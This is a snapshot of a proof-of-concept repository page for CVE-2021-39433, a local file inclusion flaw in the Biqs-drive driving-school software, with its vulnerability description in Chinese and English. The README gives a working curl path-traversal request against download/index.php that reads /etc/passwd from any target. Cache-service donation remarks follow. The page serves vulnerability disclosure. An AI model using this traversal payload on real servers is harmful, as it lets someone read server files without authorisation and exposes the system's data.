CVE-2021-39433 PoC — Biqs It Biqs-drive 安全漏洞

Source

https://github.com/PinkDraconian/CVE-2021-39433

Associated Vulnerability

Title:Biqs It Biqs-drive 安全漏洞 (CVE-2021-39433)
Description:Biqs It Biqs-drive是比利时Biqs It公司的一个在线驾驶学校软件。 BIQS IT Biqs-drive v1.83 及以下版本存在安全漏洞，该漏洞允许攻击者使用配置的网络用户的权限从服务器读取任意文件。

Description

BIQS IT Biqs-drive v1.83

Readme

# CVE-2021-39433

A local file inclusion (LFI) vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.

`curl https://TARGET/download/index.php?file=../../../../../../../../../etc/passwd`

File Snapshot


 [4.0K]  /data/pocs/87f55daf06770bcbd52a395639cb17821e4eb1c6
└── [ 390]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!